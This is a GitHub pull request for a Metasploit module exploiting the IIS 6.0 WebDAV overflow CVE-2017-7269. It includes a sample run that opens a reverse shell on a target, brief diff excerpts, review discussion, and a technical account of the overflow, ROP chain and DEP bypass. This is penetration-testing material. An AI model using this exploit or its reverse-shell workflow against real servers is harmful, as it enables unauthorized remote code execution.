### PR TITLE
Add IIS 6.0 ScStoragePathFromUrl exploit (CVE-2017-7269) (follwoup)

### PR DESCRIPTION
**Pull request by firefart**
This is a follow up PR to https://github.com/rapid7/metasploit-framework/pull/8162

The new changes auto extracts all needed values and tries to bruteforce the path length.

This PR also contains the original commits so they are not lost.

Current Drawbacks:
- Sometimes the 2k3 Server needs a reboot
- `windows/shell/reverse_tcp` is not working (See https://github.com/rapid7/metasploit-framework/issues/8357)

Sample run:
```
msf exploit(iis_webdav_scstoragepathfromurl) > options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MaxPathLength  19               yes       End of physical path brute force
   MinPathLength  19               yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST          192.168.56.3     yes       The target address
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.19.0.3       yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2


msf exploit(iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 172.19.0.3:4444 
[*] Extracting ServerName and Port
[*] Using http_host http://192.168.56.3:80
[*] Trying path length of 19...
[*] Sending payload
[*] got a connection reset
[*] Command shell session 3 opened (172.19.0.3:4444 -> 172.19.0.1:41766) at 2017-05-08 22:21:32 +0000

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

c:\windows\system32\inetsrv>
```

### CODE REVIEW

File: modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb [hunk 1]
```diff
@@ -0,0 +1,175 @@
...
+          Original exploit by Zhiniang Peng and Chen Wu.
+      },
+      'Author'         =>
+        [
+        'Zhiniang Peng', # Original author
+        'Chen Wu',       # Original author
+        'Dominic Chell <dominic@mdsec.co.uk>', # metasploit module
+        'firefart', # metasploit module
+        'zcgonvh <zcgonvh@qq.com>' # metasploit module
+        ],
```
Comment (rwhitcroft) [inline modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb]: Don't suppose I could get my name back in here?

Comment (wchen-r7) [inline modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb]: oops

Comment (FireFart) [inline modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb]: @rwhitcroft sure, what do you want in there? Nickname or real name?

Comment (FireFart) [inline modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb]: @rwhitcroft found it on the other PR and added it. If you want smth. else, just ping me

File: modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb [hunk 2]
```diff
@@ -0,0 +1,179 @@
...
+      'Platform'       => 'win',
+      'DisclosureDate' => 'Mar 26 2017',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']),
+        OptInt.new('MinPathLength', [ true, 'Start of physical path brute force', 3 ]),
+        OptInt.new('MaxPathLength', [ true, 'End of physical path brute force', 60 ]),
```
Comment (void-in) [inline modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb]: All datastore options should be in capital.

Comment (FireFart) [inline modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb]: is this really the case? seeing all kinds of variants in the modules folder. If it's a convention should we add an msftidy check for this? @wvu-r7

Comment (void-in) [inline modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb]: This style convention is documented at https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options#ideal-datastore-naming

Comment (wvu-r7) [inline modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb]: That's debatable, but yeah, that's typically the case. Normal options are uppercase (I like screaming snake), while advanced options are camel case.

Comment (wvu-r7) [inline modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb]: `msftidy` can die in a fire.

Comment (FireFart) [inline modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb]: @wvu-r7 screaming snake made my day haha changed the casing

**Comment by wwebb-r7** [comment]
As for the first payload, @bcook-r7 and @rwhitcroft were on the right path in the previous PR.  As I said regarding the shellcode (the second payload), it's run through an alpha encoder.  I'll link to it at the end.

@zcgonvh did a good job explaining considering the language barrier, hopefully I can clarify somewhat. 
 The gist of it is that the vulnerable memcpy is called multiple times within the code path the request takes it on.  In the first case, it forgoes overwriting the return address and only overflows as much as it needs to overwrite the location pointed to by a local variable, which gets used as the destination address for the next iteration of memcpy.  This address lies on the heap, and corresponds to the vftable of an IEcb object.   This memcpy also handles  loading the bulk of the exploit payload.  When the corresponding virtual function pointer that was overwritten is called, the ROP chain is entered, and the exploit uses the SharedUserData technique to bypass DEP.  From there on out, the shellcode is entered.  It's a lot more clever than I could possibly describe it at 4AM.

You can find a more complete analysis--along with commented ROP gadgets and shellcode--than the one I was working on [here](http://whereisk0shl.top/cve-2017-7269-iis6-interesting-exploit.html).  If you are fluent in Chinese, well, lucky you.  If Google Translate is more your speed, replace the word "cover" with "overwrite" and things make a lot more sense.

Again, everything needed to document this can be found in the previous PR's conversation and the linked blog post.  If someone still needs help in doing so, let me know.

**Comment by egypt** [comment]
Verified with Meterpreter (staged) and shell (single) payloads. Thanks for all your great work on this, folks!

**Comment by alrosenthal-r7** [comment]
@wchen-r7 Can you please add release notes to this pr?

**Comment by wchen-r7** [comment]
Sure, I'll do it :-)

**Comment by wchen-r7** [comment]
# Release Notes

This module exploits a vulnerability against an IIS web server, specifically IIS 6.0. The ScStoragePathFromUrl in the WebDAV service is vulnerable to an overflow, which can be exploited and gain arbitrary remote code execution.

**Comment by busterb** [comment]
Tsk tsk @egypt

**Comment by egypt** [comment]
Oh, phooey. Shame on me

**Pull request merged**